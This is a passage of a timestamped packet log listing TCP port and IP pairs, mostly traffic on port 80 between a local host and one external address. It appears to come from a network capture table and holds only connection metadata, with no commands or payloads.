Dec 13, 2024 01:37:32.044163942 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.044235945 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.044342041 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.044920921 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.045142889 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.045201063 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.045727968 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.045785904 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.045998096 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.046829939 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.046838045 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.046844959 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.048868895 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.049333096 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.049343109 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.049349070 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.049370050 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.049400091 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.049400091 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.049416065 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.049423933 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.049449921 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.049474955 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.051397085 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.051409960 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.051422119 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.051434040 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.051450014 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.051462889 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.051491022 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.052567005 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.052581072 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.052609921 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.052628040 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.052634954 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.052668095 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.052697897 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.052736044 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.055084944 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.055095911 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.055107117 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.055119038 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.055134058 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.055160046 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.055254936 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.055267096 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.055295944 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.056138039 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.056150913 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.056197882 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.056891918 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.056941032 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.057213068 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.057760954 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.057816982 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.057852030 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.058659077 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.058695078 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.058712959 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.058737993 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.059393883 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.059663057 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.059720993 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.060340881 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.060441017 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.060493946 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.061168909 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.061218023 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.061460972 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.061966896 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.062091112 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.062125921 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.062138081 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.062855959 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.062941074 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.062957048 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.063010931 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.063637018 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.063688993 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.071367979 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.071403980 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.071438074 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.071463108 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.071470976 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.071492910 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.071508884 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.071516991 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.071546078 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.071556091 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.071588039 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.072586060 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.072638988 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.076921940 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.076956034 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.076977015 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.076989889 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.076996088 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.077023983 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.077033043 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.077063084 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.078001022 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.078036070 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.078058004 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.078078985 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.078260899 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.078296900 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.078310966 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.078340054 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.079046965 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.079097033 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.079098940 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.079145908 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.080178022 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.080213070 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.080226898 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.080255032 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.080682039 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.080717087 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.080733061 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.080768108 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.149744987 CET	49738	1912	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.219497919 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.219572067 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.219599009 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.219676971 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.219815969 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.219866037 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.220010042 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.220072031 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.220887899 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.220930099 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.220936060 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.220973015 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.221554041 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.221616030 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.221698046 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.221745968 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.222589016 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.222620964 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.222642899 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.222666979 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.223422050 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.223455906 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.223469019 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.223498106 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.224147081 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.224195957 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.224891901 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.224940062 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.225224018 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.225256920 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.225270033 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.225298882 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.228149891 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.228203058 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.229253054 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.229300976 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.229557037 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.229590893 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.229604006 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.229625940 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.229630947 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.229660988 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.229667902 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.229696989 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.229706049 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.229732037 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.229733944 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.229778051 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.230669975 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.230716944 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.230849981 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.230896950 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.231359005 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.231405973 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.231487989 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.231539011 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.232346058 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.232382059 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.232394934 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.232422113 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.233163118 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.233212948 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.233329058 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.233385086 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.233982086 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.234030008 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.234154940 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.234204054 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.234857082 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.234891891 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.234904051 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.234932899 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.235718966 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.235753059 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.235769033 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.235799074 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.236563921 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.236612082 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.236735106 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.236783028 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.237406015 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.237453938 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.237596035 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.237643003 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.238209009 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.238264084 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.238384962 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.238432884 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.239074945 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.239197016 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.239274025 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.239326954 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.239944935 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.239991903 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.240087986 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.240134954 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.240803957 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.240838051 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.240850925 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.240878105 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.241632938 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.241667032 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.241682053 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.241723061 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.242475986 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.242527008 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.242649078 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.242695093 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.243367910 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.243416071 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.243503094 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.243546963 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.244216919 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.244266987 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.244384050 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.244431019 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.245086908 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.245135069 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.245265961 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.245311975 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.245919943 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.245966911 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.246083975 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.246129036 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.246784925 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.246830940 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.246953964 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.246999025 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.247628927 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.247678995 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.247849941 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.247898102 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.248451948 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.248501062 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.248619080 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.248667002 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.249300957 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.249334097 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.249345064 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.249372959 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.250144958 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.250195980 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.250314951 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.250358105 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.251022100 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.251055956 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.251069069 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.251099110 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.251861095 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.251908064 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.252032995 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.252078056 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.252712011 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.252758980 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.252880096 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.252927065 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.253559113 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.253607988 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.253730059 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.253777027 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.254420996 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.254496098 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.254574060 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.254637003 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.255285025 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.255474091 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.255501986 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.255513906 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.256258011 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.256306887 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.256341934 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.256390095 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.256872892 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.256923914 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.263262033 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.263318062 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.263406992 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.263452053 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.263875961 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.263922930 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.264060974 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.264105082 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.264687061 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.264739990 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.264887094 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.264936924 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.265546083 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.265593052 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.270351887 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.270409107 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.270523071 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.270571947 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.271018028 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.271050930 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.271065950 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.271085024 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.271090984 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.271119118 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.271131039 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.271155119 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.271166086 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.271723032 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.271756887 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.271771908 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.271799088 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.272559881 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.272608042 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.272746086 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.272793055 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.273384094 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.273416996 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.273430109 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.273454905 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.274343014 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.274378061 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.274391890 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.274420023 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.349577904 CET	49752	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:32.349585056 CET	49751	80	192.168.2.5	185.81.68.147
